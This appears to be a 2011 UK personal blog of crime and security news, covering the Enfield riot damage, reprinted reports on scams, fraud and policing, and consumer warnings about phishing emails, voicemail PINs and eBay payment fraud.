Then there are the residents living near to or on Church Street. They must have been living in fear for their lives after seeing what had happened in Tottenham the night before.

Insurance is not going to cover some of the damage that has been done. Some of these businesses are so big they cover themselves. The end result is that the prices go up, a penny here a penny there. So we all end up paying for what has been damaged or stolen. Ironically even the thugs and theives!

Then there are the small businesses. Everybody is suffering financially at the moment one way or another. Getting a window replaced can cost hundreds in excess payments alone in addition to the insurance cover. Money that these small businesses haven't got. Then there will be the increase in insurance premiums for the following year and the stipulation that shutters must be installed at further cost. The end result, will be a loss of more jobs.

Then there is the aesthetics. How many people after having a drink or evening meal wander down a high street window shopping! Those windows will now be replaced by steel shutters.

The Damage ( level of theft unknown )

Church Street

- Golden Mantella, Jeweller - shop front wrecked
- Pearsons - 2 windows broken
- Starbucks - front wrecked
- T Mobile - one side of shop window broken
- HMV - demolished frontage
- Maplin - windows damaged (since 10th August 2011)

Silver Street

- Cooperative Pharmacy - Front door and windows broken
- Bath Store - all windows broken
- Doctors Surgery - windows broken
- Nicon House ( building to let ) - all windows broken

Chase Side

- HiFi shop - window alongside the entrance door

Southbury Road

- Healthcare Pharmacy - shuttering damaged, front door and windows smashed
- Empty shop, formerly sandwich bar - Windows smashed
- Betting office - windows smashed
- Picture framing shop - window smashed
- Doctors Surgery front window broken
- Plaster mouldings shop near George Spicer School - windows broken

De Mandville Retail Park

- Morrisons - windows broken
- PC World - Inside glass door broken
- Argos - Front doors and window broken

A10 Retail park

- Sainbury's Supermarket - Front door and windows broken
- Comet electrical store - Front door and windows broken
- JB Sport - Front door and windows broken
- Sports direct - Front door and windows broken
- Currys electical store - Front door and windows broken
- Krispy Kreme (donut store) - side windows broken (since 10th August)

Ponders End / Southbury Road

- Tesco - Windows broken

Lack of Management

Independent of the shooting that occurred in Tottenham, there has been much criticism of the Police since. The poor Police on the ground did what they could, but they were few. 1600 for the whole of London!  I think that the main problem has been with their senior management. Last night they swamped London with 16,000 Police. Then funny enough it was quieter (please excuse my sarcasm).

Statistically the London Mayor has stated that there is more Police in London than there has ever been ( around 30,000 heads and falling ), but to be able to raise the numbers they had last night, indeed previous nights had to borrow officers from surrounding counties. It appears that the majority of the injuries that have occurred have been to the Police themselves and this was probably down to their initial low numbers.

On Sky News this morning a former senior police officer was asked; what can be done to control events like these? One of his responses was "lets hope that it rains"!

Will there now be a rethink into Police numbers ? Or will it be more CCTV camera's and massaged statistics ?

(10th August 2011)


 

HARRY POTTER HIT BY HI-TECH CONMEN
(BBC News, dated 5th August)

Cyber conmen are cashing in on interest surrounding the Pottermore website.

Through Pottermore, JK Rowling will release more stories and background from the world of Harry Potter. Pottermore officially opens in October, and scammers are selling fake accounts for the site that claim to give fans early access.

They are also using search engine poisoning to direct Potter fans to sites that are seeded with viruses and other malicious programs.

Discovered by veteran security researcher Chris Boyd, the scams largely revolve around early access to the Pottermore website.
The public at large will be able to sign up in October but early, or beta, access is being granted to people before then if they are among the fastest to complete a magical quill challenge on the Pottermore site.

The challenge runs every day from 31 July to 6 August and about one million beta accounts will be given away.

Scammers are now offering to register people for this challenge and are getting hold of their personal details as a result. Also, Mr Boyd discovered, some scammers are supposedly selling Pottermore accounts for about $100 (£60) via eBay.

While many of these are likely to be fake, some are being offered by fans who have set up more than one account for Pottermore.

The administrators of the Pottermore website have noticed the trade in accounts and have issued a warning about the practice.

In a blog post, the Pottermore administrators said buying and selling accounts was "expressly prohibited" in the terms and conditions. Also, it added, signing up with a view to selling an account "deprives genuine fans the chance to gain early access".

It added: "We have the right to terminate any Pottermore accounts that are sold online."

Videos of people successfully signing up to Pottermore are being posted on YouTube but, found Mr Boyd, many lead to surveys tied to affiliate marketing schemes. Those who fill in the surveys get the offer of a download as a reward that is often found to be full of malware or adware.

Scammers are also starting to poison search engine results associated with Pottermore to direct people to sites loaded with malicious programs.

One site found by Mr Boyd is known to have harboured fake security software that claims to find viruses on a PC and asks for cash to clean up the non-existent problem.

(10th August 2011)


 

5000 ARRESTED IN OPERATION TARGET
(Courtesy of: Metropolitan Police, dated 29th July 2011)

The operation, which was launched on Wednesday 8 June, is tackling crime against people and property, and aims to achieve significant long term reductions in robbery, burglary and violent crime.

"5,000 arrests shows the Met's commitment, through Operation Target to deal with the issues that matter to local communities."

5,187 people have been arrested to date for firearms, robbery, burglary and other offences since the operation began. More than 1,500 officers, from across the MPS have been invovled in a sustained campaign of overt and covert operations, including increased patrols and proactive investigations to pursue suspects. 19 people were arrested on Monday night alone in five separate operations in Westminster.

Assistant Commissioner Ian McPherson, head of MPS Territorial Policing, said: "5,000 arrests shows the Met's commitment, through Operation Target to deal with the issues that matter to local communities.

"By bringing together borough based knowledge and expertise with the skills of our specialist units we will make a real and sustainable difference, allowing people to go about their daily lives feeling more safe and confident.

"Thousands of suspects have been arrested; suspected stolen property has been recovered; and drugs and weapons have been removed from the streets.

"While overall crime continues to fall - and is at its lowest in ten years - we have seen recent increases in robbery and burglary which we are determined to tackle. However, street robbery and burglary are still relatively far lower than previous years including 2006 when robbery was at peak levels.

"Our concerted actions in the Operation Target areas has seen reductions in overall crime and violence, while I'm pleased to report we have now stopped the increases in robbery and burglary in those areas. Over the next few weeks and months we will be working tirelessly to turn the corner and bring these offences down further - not only in the Operation Target areas, but across the whole of London and we will use our resources most effectively in the places that are affected most."

The main factors for this year's increase are a 92% increase in the theft of mobile phones and an increase in robbery of gold where thieves are targeting necklaces in particular and selling the jewellery on for cash through the second hand market.

Police have been working with external partners to close down disreputable businesses and venues such as pawn shops, licensed premises, and crack houses - places which attract or generate crime and anti-social behaviour. The MPS has also been working with the mobile phone industry to see how technology and software can help reduce street crime.

"The public can support this operation and help themselves from becoming a victim of crime by taking some basic prevention measures, for example, when out, where possible try to keep any valuables hidden. Smart phones and media players are becoming must-have items for criminals who see these items as cash.

"Many robberies happen when people check their phones just after leaving a bus or tube or when they are distracted. For more information or advice on how to keep safe visit met.police.uk/crimeprevention

"Delivering on Operation Target is a key priority for the MPS as it is tackling the crimes that significantly impact on local communities and their confidence in us to help keep them safe.

I can reassure Londoners that we will keep on relentlessly pursuing robbers, burglars and other criminals and bring them to justice to help keep London's communities safe."

(10th August 2011)


 

INSURANCE FRAUD LEVELS SOAR
(The Guardian, dated 28th July 2011)
www.guardian.co.uk  [Note 1]

Insurers uncovered 133,000 fraudulent insurance claims worth £919m in 2010, meaning the public registered 2,500 fake claims every week - a rise of 9% on 2009, according to figures from the Association of British Insurers.

It said the number and value of detected insurance frauds had risen by more than 100% over the past five years.

Fraudulent claims cost the insurance industry an estimated £2bn a year, adding an average £44 a year to the insurance bill for every UK policyholder.

The scale of the problem has provoked insurers to set up an insurance fraud register early next year, which will contain details of insurance cheats.

The most common frauds involved home insurance with 66,000 bogus or exaggerated claims discovered by insurers, followed by 40,000 dishonest motor insurance claims. Motor frauds were the most costly, totalling £466m.

The ABI said one claim for back injuries sustained from a fall while working in a nightclub was rejected when Facebook images showed the claimant performing gymnastics and training for a charity run.

A woman's claim for facial injuries she said resulted from a falling toilet roll holder in a fast food outlet was rejected when it was shown that the holder would have had to have fallen upwards to cause the injury.

A claim for injury said to be caused by falling over a wall was rejected when it was proved that there was no wall at the scene of the alleged incident.

Nick Starling, the ABI's director of general insurance and health, said: "Fraudsters continually look for new ways to con insurers, so we are upping our game. Early next year, we will be setting up a national insurance fraud register, which will contain details of all known insurance cheats.

"And at the same time the first ever national police insurance fraud investigation unit will begin its operations, making it harder than ever to commit insurance fraud."

Glen Marr, director of the Insurance Fraud Bureau said the organisation wanted consumers to report anyone they suspected of committing insurance fraud via its Cheatline: "At the IFB, we have access to a significant volume of industry data, use sophisticated and powerful analytical software, work in partnership with insurers, law enforcement and regulators, and have no shortage of reports being received from consumers of their knowledge or suspicions of those concerned with defrauding the industry, through our Cheatline facility.

"It's important to underline that some of those concerned with insurance fraud are also involved in criminal activities where there is harm to local communities."

(10th August 2011)


 

CITY POLICE TARGET NEW BRITISH FRAUD MODUS OPERANDI
(City of London Police, dated 24th June 2011)

Omar Eshpari, 30, from Enfield, North London, Dean Straker, 32, from St Albans, Hertfordshire, Stefan Mitchell, 41, from Coulsdon, Surrey, and Derial White, 26, from London, were all charged with conspiracy to defraud before being released on bail.

The charges follow enquiries conducted into Pemberton International Ltd, Eldon International Ltd, Willow International Ltd and Allied Investment Management Ltd.

It is believed the activities of these companies, surrounding investments in land, resulted in losses of millions of pounds to UK investors, with the land being apparently misrepresented in both its potential use and its ownership when sold.

'Land banking' fraud is an emerging phenomenon where genuine investors are duped into purchasing plots of worthless land.

It was recently estimated to be worth at least £200 million, and City of London Police is currently conducting a number of criminal investigations across the country.

Commissioner of the City of London Police, Adrian Leppard, said: "Land is a tangible asset and is increasingly viewed as a safer place to invest than stocks and shares.

"Unfortunately organised crime gangs appear to be wise to this and are now targeting people across the UK, especially the elderly and vulnerable, with cold calls offering bogus investments.

"These criminal charges are an important landmark and emphasise how tackling 'land banking' fraud is now a major priority for the City of London Police."

Luke Dockwray, reviewing lawyer in the CPS Central Fraud Group, said:  This is the first time the Crown Prosecution Service has brought a prosecution for a 'land banking' fraud. The evidence we have suggests that these defendants sold land to investors by falsely representing that the land was suitable for future development and offered real investment opportunity.

"I considered over 16,000 pages of evidence gathered by the City of London Police during their investigation. Having reviewed that material, I have concluded that there is sufficient evidence for a realistic prospect of conviction, and that it is in the public interest to charge Omar Eshpari, Stefan Mitchell, Dean Straker and Derial White with conspiracy to defraud their investors."

(10th August 2011)


 

BEWARE OF "WRONG TRANSACTION" HOTEL SPAM
(IDG, dated 27th July 2011 author Robert McMillan)
www.idg.com   [Note 1]

If you get an email message telling you a hotel has erroneously charged your credit card account, be careful. The odds are that it's part of a new spam campaign that could infect your computer.

The messages started popping up in recent days and there are already hundreds of variants on the same theme: A hotel wrongly charged a credit card number and the victim is supposed to fill out an attached form to process the refund.

"Please see the attached form. You need to fill it out and contact your bank for return of funds," read one such message, titled "Hotel Breakers Palm Beach made wrong transaction."

The 'refund' form is actually a malicious Trojan horse program that installs fake antivirus software on the victim's computer, according to Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham.

His group, which maintains a massive real-time database of spam messages, has received more than 800 copies of the spam. That's not a lot of messages, but the campaign is still new.

The messages seem to be coming from the same botnet of infected computers that recently sent out similar messages warning victims that their credit card payments were overdue. Those messages led to the fake antivirus downloads too, Warner wrote in his blog post.

It's standard operating procedure for spammers to alter their messages now and then to trick new victims. But any unsolicited message that includes an attachment should always be treated as suspicious.

Editors Note

It appears that only hotels in the USA are being quoted at the moment, but you can guarantee that it won't be long before the UK and European hotel chains will be quoted. The current hotel chains that these bogus e-mails mention are :

Renaisance
Hyatt Regency
Sheraton
Westin
Hilton
Intercontinental

(29th July 2011)


 

MORE NEWS FROM MY SPAM INBOX ! - JULY 2011
Category : phishing

My Internet Service Providers (ISP) spam filter has continued to do a very good job. The last 2 weeks have been very busy with online fraud as it has managed to filter out 13 phishing e mails and place them in a "be warned" post box.

The latest batch of phishing e-mails include :

HALIFAX BANK - Nine e-mails have been received with three variations of originators name "Halifax Bank", "Halifax Bank Plc" and "Halifax - Internet Banking". The following are examples of the attached messages :

Dear Customer,

Access to your account has been suspended !! To re-gain access, Please follow the link below
providing the required security informations.

Dear Customer,

The "Halifax - Internet Banking" message had an attachment and the following message :

Reinstate your Halifax Online Banking Accounts. kindly proceed via the Halifax secure access page via attachment.

SANTANDER - A request to re-enter my personal information as they have had problems with their internal servers. click on provided link.

POST EXPRESS OFFICE (e-mail address quoted as postmail-US) - e-mail states that a parcel for me is awaiting collection, but I need to click on the attached document for package reference number.

IRS ( US Tax office - I am not in US ) - Entitled "Rejected Federal Tax transfer". For further information of transactions failure, click on pdf document. The attached document was labelled with the letters "pdf" in the title, but it was a .exe file. This means that the file is executable and would probably load some nasty things onto your computer.

LLOYDS TSB - e-mail stating that account had been accessed from an un-authorized location and that bank account had been deactivated. Click on link to reactivate.

ALLIANCE AND LEICESTER - An e-mail stating that if I click on the attached link and entered all of my personal details I would be guaranteed to receive a full reimbursement of any monetary loss in the future!

All of these e mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately and do not CLICK on any link or open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, DO NOT use contact details within these bogus e-mails.

(25th July 2011)


 

PREVENT VOICEMAIL HACKING

Currently there is a lot going on about mobile phone hacking. But using the word "hacking" implies some form of devious technical wizardry to "break-in" to peoples voicemail. This also implies that there is nothing that we mere mortals can do to prevent the evil deed from occurring. The thing is, it is relatively easy to reduce the likelihood of having your privacy being put in jeopardy. We have heard so much about the people who have committed the crime, but nothing about any security lapses of the mobile phone companies. That is because they are not at fault. In fact every mobile phone company has instructions on their websites ( and probably the paper manuals that comes with each and every mobile phone).

The instructions are quite simple; they are the instructions for setting the Voicemail PIN.

When you purchase a mobile phone, you probably check that it can receive calls, make calls, use an App, load an App, surf the internet, and lastly pick up Voicemail messages. You may even activate the phones password facility to prevent unauthorised use; THIS IS NOT THE VOICEMAIL PIN.

When you press the correct button or enter the code for voicemail the mobile operators system will recognise your phone number and connect you to your personal messages automatically.

The thing is, the mobile phone operators also provide the facility where you can access your Voicemail messages remotely from a normal landline or another mobile. To access your Voicemail using this facility you simply call your mobile company's voicemail access number (either a landline or mobile telephone number), type in your own mobile number followed by your PIN. Now this is the problem, the PIN ( if not altered ) is set to a default number. The default PIN varies between mobile phone operators, but every mobile phone working on their system will have the same default PIN. Unless changed by you !

In some cases you don't even need to do what I have described. Some mobile service providers simply allow you to dial your mobile number, when you get diverted to voicemail you press #, followed by your PIN ( which could be the default number ) and hey-presto you can listen to your messages.

It is this facility that criminals have probably been using to access peoples Voicemail. Many Mobile phone network companies have now changed the voicemail security, but some haven't.

SO PERSONALISE YOUR VOICEMAIL PIN, NOW !

Recommendation

Set up your Voicemail PIN as soon as you receive your phone or SIM card. Here are a few hints and tips to keep in mind when setting your PIN number.

- When choosing a PIN number make sure it is memorable but not too obvious.
- Avoid numbers like 0000, 1111 or 1234.
- DO NOT use your date of birth.
- Never share your PIN number with anyone.
- If you suspect someone knows your PIN number, change it immediately.
- Ideally avoid writing your PIN number down. If you do, keep it at home and in a safe place.
- DO NOT USE YOUR BANKING PIN NUMBER

(25th July 2011)


 

ITS EUROPE JIM, BUT NOT AS WE KNOW IT !

I may have given this article a light-hearted title and this probably belittles the seriousness of the situation that I encountered, but never mind.

Living within the UK we are probably victims of surveillance of some shape or form everyday through CCTV. According to The Independent ( 2nd November 2006 )"There are an estimated 4.2 million CCTV cameras in Britain: one for every 14 people". Do we take any notice, not really, the only ones we may pay attention to are speed camera's.

Then there are some cultural differences on how we (in the UK) react to crime and the law. This time last year I was travelling around Brussells and virtually every other bus had an advert on it warning parents to protect their children against paedophiles. The warning is great idea, but I didn't know that Belgium had such a problem !
What about a simple thing like crossing the road ! You are late for your train, the road is clear and you ignore the little red man at the pedestrian crossing and cross the road. Not in Atlanta, Georgia you don't. A couple of years ago a Spanish Historian who was a guest speaker at conference at the Atlanta Convention Centre was "agressively arrested" (a couple of cracked ribs and bruises paid testament to that ) when he continued to jay-walk after being advised not to do so by a plain-clothed Police Officer.

So back to the main story. Having visited Budapest before I was aware of most of the countries cultural niceties and it's social situation. It is a great place to visit, lots to see, friendly people; but I was not expecting what I experienced.

I will begin with some translation :

Hid = bridge
Ter = Square
Utca / Ut = Road or street
Rakpart = quay

I was travelling with my Wife and we stayed at the Kempinski Hotel within the city centre adjacent to the British Embassy. There were several EU meetings during the time of our visit and many EU Diplomats and politicians stayed in our hotel. This accounted for a high level of security in and around our hotel.

As a tourist we travelled around the city visiting art galleries, museums and tourist sites. Some of my visits were stimulated by articles that I had read in the English language "Budapest Times". One such article was about Freedom Square (Szabadsag Ter). The article mentioned that the Square housed one of the final monuments of Soviet domination and that the Square may be renamed as Roosevelt Square in the future. There was also a hint within the article that the monument could be moved to another site due to its links with the former communist regime. The monument also had a large gold Soviet Star at its head and for all other causes had been outlawed in Hungary for almost 20 years.The name change would also offer a better association with one of its inhabitants, the US Embassy.

On the penultimate day of our stay I decided that I was going walk alone around the city centre and take photographs of places of interest. So my morning route was from my hotel to St Stephens Basilica, Freedom Square and then the Holocaust Memorial on the Danube. Being conscious of the US Embassy being adjacent to the Soviet Memorial I was wary that I should not point my camera in that direction. I then walked towards the Danube down Zoltan Utca, for the Holocaust Memorial.

On reaching Szechenyi Rakpart I realised I could not reach the Holocaust Memorial due to the fast heavy traffic.  So I walked towards the Chain Bridge and a road crossing. This was a distance of 400 metres approx. As I approached the Chain Bridge road crossing I was conscious of two people alongside me ( a bearded man in a blue rain coat and a younger man with a laptop case). The Bearded man walked to the nearby Number 2 tram stop ( this is raised approximately 4 metres above to Danube bank and provides a good viewing platform towards the memorial),  Laptop man walked either adjacent or behind me to the Pest bank of the Danube. To check what was going on I
walked about 50 metres along the bank from the Chain Bridge and stopped,  the person ( Laptop man ) following me walked a further 10 metres and stopped. I took some photo's of the Buda side and the Chain Bridge then retraced my steps to the Chain Bridge and took some close-ups photographs of the bridge. Laptop man also retraced his steps and stopped 10 metres from me. After 5 minutes I then returned to my original walk towards the Holocaust Memorial. At this stage Laptop man froze and stared at me as I walked by. I continued my walk as Laptop man walked to the Tram stop and talked to the Bearded man (by this time he had removed his coat). Laptop man then
returned to the bank of the Danube near where I took my photographs and took a seat. During this period three tram 2's passed, but Bearded man did not board. When I reached the Holocaust Memorial I took my photographs and returned towards the Chain Bridge crossing. The Bearded man was still at the tram stop, by this time at least another two trams had passed in either direction. As I approached the bridge, Laptop man stood up and walked away from me. The Bearded man seemed to make a big thing about putting his coat on, shaking it as he did so.

I got on the same tram as the Bearded man in the direction of Lagymanyosi Hid, but he got off the tram after only one stop ( outside the Marriott Hotel ).

I took my first photograph within Freedom Square at 09.21 (local). I took photographs of the Bearded Man and Laptop Man at 10.03 (local) prior to boarding the tram. So I was being followed for almost 40 minutes. I continued my sightseeing for the remainder of the day without any further apparent scrutiny.

Weird or what ? I raised this story as an issue with my local MP. My concern was to whether this incident ( if it can be described as that ) was either State surveillance or criminal activity. His written response in short was that he could not comment on another nations security measures; and in all honesty he couldn't really.

So treat this article as a kind of a warning. Be aware of what you are doing and what your surroundings are. Just because you have done something at home or in another country doesn't necessarily mean it is acceptable where you are now, regardless of how innocent those actions are.

(18th July 2011)


 

ITS A HOLD-UP

If you are thinking about outsourcing any of your background functions to another organisation you may want to consider some of the pit-falls raised in this story first.

The story is true, but the names of the organisations involved have been changed. Traditionally, along the lines of other stories the names have been changed to protect the innocent. If any name changes match reality that is purely coincidental.

This article describes a multi-national peg manufacturing company called "Holdem Peg Co Ltd". It manufactures and sells pegs all over the world, from the basic wooden peg to their premium stainless steel pegs with soft hold springs. The company sells its products to wholesalers and sometimes directly to large retailers. One of the company's major selling points is its pre-sales support. Any questions that a customer or retailer has about one of its products could be answered by a call to one of its regional helplines. The company operates its helplines on a regional basis; ie. North America, Asia and the Pacific rim, Africa and the Middle-East, Europe etc. The Advisers in each of the centres speak the language of the region that they cover.

To enable the Advisers to answer questions on the product range they work with a computer driven script ( a Custmer Service System - CSS) that eventually comes up with the solution to the question. Larger retailers are provided with a similar computer solution that helps their customers to decide on what product to purchase. The regional helpdesks also offer support on the working of that system if a problem is encountered.

As with most companies worldwide, Holdem was always looking out on how it could save money. As always the most money could be saved by reducing its staffing overhead. Therefore, one of the areas where it decided to make changes was with its Helpdesks. The company that won its worldwide tender was "Goodcall Inc". This company was chosen for two reasons; its international presence and it's ability to also deal with future software development to the CSS.

One of its ways Goodcall of reducing costs was to only staff each of its helpdesk centres with adequate levels to answer the average number of calls received during a normal week and that could be answered in under 3 minutes. On that basis, their client (Holdem) would be charged for a basic package (includes 3200 calls) on a monthly basis. If Holdem held a marketing drive ( extra Newspaper and TV advertising ) they should give Goodcall Inc 4 weeks notice so that they could hire and train more agency staff to be able to deal with the extra calls within the required time. The cost to the client ( Holdem ) in this case would be based on a set fee for the first 600 extra calls and then another fee on top for every additional 50 calls on top of that. As you can see, we are starting to get into a scenario where you would need a degree in accountancy to work the figures out, but Holdem was happy with the suggested concept.

Goodcall Inc based its helpdesk for the whole of Europe in the North of England, whilst their client liaison team was based at the Holdem's European HQ in the South of England.

So there we have it, Holdem was saving money, Goodcall was apparently offering a good service and was making a profit. But things were not quite as simple as it first appears.

Two years after the Goodcall service commenced one of their customer liaison team became ill and needed to be replaced. The replacement team member (Fred) realised that there were some problems and put some remedial processes in place to cure the problem. Fred also started to make monthly visits to the Helpdesk, something that hadn't been done before. This had normally been left to the Senior Liaison Manager (Julian). Based on Freds visits further improvements were made to the Advisers environment and the CSS at minimal cost, but the results were major efficiencies in the Helpdesk service. As previously mentioned, the costing arrangements were very complex, so another team member (John) was bought in to design a spreadsheet tool that would do all of the number crunching.
 
John remained on the team for about a year and his costing model seemed to do the trick. Every time the client warned of a marketing drive the model came up with a reasonable estimate of the cost. Holdem was happy with how close the estimate was to the final cost.

In Freds second year on the team he started to notice his managers extravagant entertainment of the clients representatives. This included fancy meals, overnight drinking sessions and stay overs. Fred was invited to one overnight swaray where drugs were also provided. The only thing was that the available budget to pay for such events was not adequate, but they continued.

When John left the liaison team Fred was made responsible for the costing spreadsheet. It came with basic instructions, but Fred wanted to know how it worked. Based on all the logic of the spreadsheets mathematical equations the thing should not have worked. So Fred called on an acquaintance in the Goodcall finance team to make further checks. They came to the same conclusion, but with a commentary on how the spreadsheet model worked. You had to enter the answer in the spreadsheet for it to provide a result. The whole thing was "smoke and mirrors" to dupe Holdem representatives. That is why the estimates were always so near to the final cost !

Fred also discovered another strange anomally; and this was to do with the staffing levels on the Helpdesk in the Northern office. The responsibility of dealing ( contracts etc ) with the recruitment company was solely in the hands of Julian. As was the quarterly payments of their invoices.The recruitment agency was based in the North and specialised in multi-lingual workers. Julian also made visits to the Helpdesk on a quarterly basis which coincided with these invoice payments.

As for staffing anomally. Goodcalls contract with its client was to increase the number of agency staff on the helpdesk during times of high demand ( marketing drives ). Typically, according to calculations these required an additional eight staff to be hired. On two occassions over the course of a year Fred managed to visit the Helpdesk during these marketing drives, but noticed that only four addtional staff had been taken on. On checking the annual finance reports Fred discovered that Goodall had been paying for the four additonal "phantom staff" at a cost of £100,000 per year.

One of the strange management arrangements of Goodall was that they had no reasonably sized finance department to scrutinise their client accounts. They only investigated an account if it was making loss or inadequate profit. The Holdem account was making a profit !

Fred raised the issue of the excessive entertainment and "phamtom staff" directly with Goodalls Finance Director. Based on the suspicions an accountancy investigation team was put in place. They discovered that over 4 years £500,000 had been embezelled by the original customer liaison team, which included some of Goodcalls senior departmental managers. The parties that were held were to keep the Holdem representatives "sweet" and they also received a financial inducement to report positively on how the Goodcall operation was working. Julian had made an agreement with the recruitment agency to make a split of the profits of the "phamtom staff", hence his quarterly visits to the helpdesk. This was also cover for him making visits to the recruitment agency for his and his associates part of the takings.

The end result was that Fred was moved to another client account. Julian and the other members of the Goodcall customer liaison team were dismissed along with the off site senior managers. Holdem also dismissed its representatives who were receiving the inducement. A delegation from both of the companies boards held a meeting in secret where they agreed not to make details of the crime public for fear of the affect it would have on their shares. Finally the contract was terminated and Holdem went back to managing it's own helpdesk.

As for John of the dodgy spreadsheet, he still works for Goodcall !

(18th July 2011)




MOBILE PHONE SAFETY

 

We have all heard in the news the latest scares on mobile safety, but few articles seek to provide any advice to  us personally. So from the land of litigation where everybody is allowed to make an educated choice, here is an article that provides some more information on how much radiation comes from a specific telephone. The USA also has a legal limit on the amount of radiation that can be emitted from mobiles sold there.

Caveate to article

The research quoted in the following article was carried out in the USA. So the power levels quoted for each of the mobile phones on their database may not be the power levels transmitted by the same mobile within the UK.

An analogy is the motor industry. Vehicles manufactured outside of the USA and imported in have to me modified to comply with their emission requirements. Those modifications also effect the vehicles power output. Conversely, outside of city centres in the USA, the mobile phone transmission / reception cells ( or distance between aerials ) is much greater than in the UK. So the mobile phones may need to be more powerful.

The following link takes you to an article that includes a search facility of a database of mobile phone radiation levels. In the USA, the maximum permitted radiation level is 1.6 Watts / kilo (human body mass).
 

WHATS YOUR CELL PHONE'S MAXIMUM RADIATION LEVEL
(Computerworld, dated 3rd June 2011 author Sharon Machliss)

 With recent news of a possible link between cell phone radiation and risk of brain cancer, you may have a new-found interest in knowing how much radiation your mobile handset is giving off -- or, more importantly, how much
your body might be absorbing.
www.computerworld.com/s/article/9217287  [Note 1]

(20th June 2011)


 



FRAUD VARIATION

We keeping on hearing how fraudsters hit people for money by phishing via e-mail, but what about this, they are also hitting people selling goods on eBay !

This is the scenario, a genuine seller places a UK Blackberry mobile phone with a UK SIM on eBay. They place the item for sale for 10 days and they set the reserve. After the couple of days the bids reach £40, then out of the blue a bid is placed for £140 + p&p from a reliable bidder in Canada, but via the eBay messaging system (time 5.56am). The eBay message asked for the vendors PayPal public e-mail address. The vendor then receives another e-mail to his PayPal public e-mail address (time 11.14am) from PayPal, this included the company logo's and what appeared to be in the main standard PayPal text :

"This is a confirmation email of a payment of £155.00 GBP received from #########. What we required from you in order to get your account credited is the item's shipping tracking/reference number, this number will be given to you at the courier office after you might have sent the item to the bearer, this is part of our new policy and a security measure in other to protect both the buyer and the seller, also to verify if the item was really bought from you we have sent you a confirmation email earlier on to inform you that the payment is legal and has been confirmed, also to guide you against fraudulent acts."

Another message was then received on the vendors PayPal public e-mail (time 5.15pm) where the buyer states that they have paid the required amount via PayPal and then asks the vendor to post the mobile to an address in "Nigeria". So we have a eBay buyer from Canada, purchasing a mobile with a UK SIM, wanting their purchase to be sent to Nigeria ?

So, if the PayPal e mail states that the agreed purchase price has been paid into the vendors account, then the PayPal online account should also show the credit, it didn't !

It appears that the fraudster had hijacked the bonafide purchasers account (someone who had been a member since 2003 and had a 100% reliability record). They then contacted vendors to make purchases and then followed up with a "bogus PayPal" confirmation of payment e-mail. This was then followed with another e-mail stating the delivery address. Which in this case did not line up with the true PayPal account holders recorded location. Remember, PayPal will inform vendors of completed financial transactions via their Private PayPal e-mail address. In this fraudulent example, they didn't.

These fraudsters were tracking how the fraud was going from the openning to closing statement, about 12 hours from start to finish. It was almost a prject management exercise, so how many other simultaneous fiddles were going on ?

So how was the Canadians eBay account hijacked ? Well they probably received an e-mail from a "bogus eBay" stating that their account had been compromised; and that by clicking on the convenient attached link they will be taken to an area of the eBay website where their security details (username, passwords etc) can be entered and checked.

The vendor in this example of a true incident was vigilant, looked at the clues, then checked to see if the payment had actually been received.

As with all phishing attacks, check all transactions and warnings directly with the organisation where it is claimed there is a problem. Not using links that you are being directed to use.

If you have experienced this fraud, but are not financially disadvantaged, advise eBay of the situation. By doing so, the hacked account can have it's security restored or shut down.

If you have experienced this fraud and have been financially disadvantaged (lost money and/or property ), advise eBay of the situation. In addition, report the crime to Action Fraud ( telephone 0300 123 2040 ) or via their website : www.actionfraud.org.uk

(20th June 2011)


 

MET COMPLETES SAFER NEIGHBOURHOODS REVIEW
(Courtesy of Metropolitan Police, dated 9th June 2011)
www.met.police.uk

The MPS remains committed to neighbourhood policing following an extensive review and is to recommend that every local community will retain its dedicated Safer Neighbourhoods team, comprising of at least two constables and three police community support officers.

Under our proposals, which are due to be debated at the Metropolitan Police Authority next week 16 June, Safer Neighbourhoods Teams, which were introduced in 2006 will continue to be aligned to political ward boundaries, and will remain responsible for addressing local crime and safety concerns. They will also remain under the operational control of the borough commander.

There will be no reduction in the number of PCs and PCSOs within Safer Neighbourhoods Teams so every ward will retain a dedicated team of at least two PC and three PCSOs. Boroughs that currently have enhanced teams with six PCSOs will also retain these staff.

However, changes are being proposed that will, on occasion, see Safer Neighbourhood resources used more flexibly to support other wards in the borough. During these periods of temporary deployment to other areas, wards that are supporting their neighbours will still retain a minimum strength of one PC and one PCSO from its dedicated team to make sure there is still a permanent uniformed presence in every ward.Another key proposal is to make reducing crime and anti-social behaviour explicit objectives of Safer Neighbourhoods activity in addition to the priorities of the community, which are through ward panels. In addition there are proposed changes to supervisory roles where sergeants may be responsible for more than one team.

Assistant Commissioner Ian McPherson, head of Territorial Policing said: "I'm delighted to announce the MPS remains committed to neighbourhood policing. This means that under our proposals every ward in London will continue to have its own Safer Neighbourhoods team working with and for local people."

"We intend for our Safer Neighbourhoods teams, which have become familiar sights in local communities, to continue to do the things they have always done by supporting local communities and helping address their crime or safety concerns. And we propose to keep each team with at least two PCs and three PCSOs, which we intend to protect from any reductions.

"Borough commanders will retain operational control of their SN teams and ensure they are being used in the right way to work with local people to help keep communities safe. I'm pleased to reaffirm the Met's strong commitment to community policing."

Proposals from the review of Safer Neighbourhoods are due to be discussed at the MPA Strategic and Operational

Policing committee on 16 June: http://www.mpa.gov.uk/

(13th June 2011)


 

MORE NEWS FROM MY SPAM INBOX !
Category : phishing
 
My Internet Service Providers (ISP) spam filter has again done a very good job. From mid May until now it has managed to filter out 4 phishing e mails and place them in a "be warned" post box.The latest batch of phishing e-mails include :

Lloyds TSB (2) - Several attempts have been made to access your account, your account has been de-activated. Please supply your security information to re-activate.

New for the year :

Facebook - It appears that your accounts security has been compromised. Please access you account ( by the convenient "bogus" link ).

Northern Rock - We notices that your account may have been accessed by an unauthorized third party. Protecting the security of your account is our prime concern. Therefore, as a temporary measure, we have limited access to sensitive account features. To restore your account access, we need you to confirm your identity. Please access you account ( by the convenient "bogus" link ).

All of these e mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within these bogus e-mails.

(13th June 2011)


 

IMF HIT BY VERY MAJOR CYBER SECURITY ATTACK
(BBC News, dated 12th June 2011)
www.bbc.co.uk

The International Monetary Fund (IMF) says it has been targeted by a sophisticated cyber attack.

Officials at the fund gave few details but said the attack earlier this year had been "a very major breach" of its systems, the New York Times reports.

Cyber security officials said the hack was designed to install software to create a "digital insider presence".

